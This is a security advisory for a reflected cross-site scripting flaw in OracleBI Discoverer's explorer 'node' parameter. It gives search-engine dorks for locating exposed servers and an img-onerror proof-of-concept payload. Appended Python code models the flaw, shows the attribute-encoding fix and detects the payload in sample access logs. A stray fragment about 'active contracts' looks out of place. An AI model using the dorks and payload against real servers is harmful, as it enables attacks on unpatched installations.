OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

2012.12.13
Credit: Ur0b0r0x
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Author: Ur0b0r0x
# Twitter: @Ur0b0r0x
# Email: ur0b0r0x_@live.com
# Line: GreyHat
# Home: ur0b0r0x.blogspot.com
# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Access Data Base - Cross Site Scripting
# dork1: inurl:discoverer/viewer?
# dork2: inurl:/discoverer/app/connection
# dork3: inurl:/discoverer/app/econnection
# dork4: inurl:/discoverer/app/
# dork5: inurl:/discoverer/app/explorer"
# Date: 12/12/2012
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html
# Vendor Name: Oracle
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[08/12/2012] - Vulnerability discovered
[11/12/2012] - Vendor notified, no response
[12/12/2012] - Public disclosure
--------------------------------------------------

#Proof Concept
http://ur0b0r0x.blogspot.com/

#Code/Xss/Path
explorer?node="><img src="x" onerror="alert('XSS')" />

#Code/Active contracts by Opdiv, office code, completion date - Active Contracts
Sample/Demo/Full_Access/
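The PoC value above works because the `node` parameter is reflected into an HTML attribute without encoding: the leading `">` closes the attribute and the tag, and the injected `<img>` then supplies its own `onerror` handler. The Python below is an added example, not code from the advisory or from Oracle: it models that unencoded reflection beside an attribute-encoded version, parses both the way a browser would to confirm only the encoded one stays inert, and flags requests whose decoded `node` value carries markup in constructed Apache-style access-log lines (the `<input>` template and the log lines are assumptions).

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# The advisory's PoC value for the node parameter (the only page-supplied specific).
POC_NODE = '"><img src="x" onerror="alert(\'XSS\')" />'

def render_unsafe(node):
    """Models the flaw: node is reflected into an attribute without encoding."""
    return f'<input type="hidden" name="node" value="{node}">'

def render_safe(node):
    """Fix: HTML-attribute-encode the value; quote=True also encodes " and '."""
    return f'<input type="hidden" name="node" value="{escape(node, quote=True)}">'

class _Tags(HTMLParser):
    # Collects start tags so we can see what a browser would actually create.
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))
    handle_startendtag = handle_starttag  # <img ... /> is self-closing

def injected_handlers(rendered):
    """Tag names carrying an on* event attribute after parsing the rendered HTML."""
    p = _Tags()
    p.feed(rendered)
    return [t for t, a in p.tags if any(k.startswith("on") for k in a)]

# Constructed Apache-style access-log lines (not from the advisory) for detection.
LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2012:10:01:02 +0100] "GET /discoverer/app/explorer?node=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Dec/2012:10:01:07 +0100] "GET /discoverer/app/explorer?node=%22%3E%3Cimg%20src%3D%22x%22'
    '%20onerror%3D%22alert(%27XSS%27)%22%20%2F%3E HTTP/1.1" 200 611',
]
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
MARKUP_RE = re.compile(r"""[<>"']|\bon\w+\s*=""", re.I)  # markup chars or on*= assignment

def suspicious_node_requests(lines):
    """Decoded node values on /discoverer/app/explorer that carry markup or an event handler."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path.endswith("/discoverer/app/explorer"):
            for value in parse_qs(parts.query).get("node", []):  # parse_qs percent-decodes
                if MARKUP_RE.search(value):
                    hits.append(value)
    return hits
```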

References:

http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html



Copyright 2024, cxsecurity.com
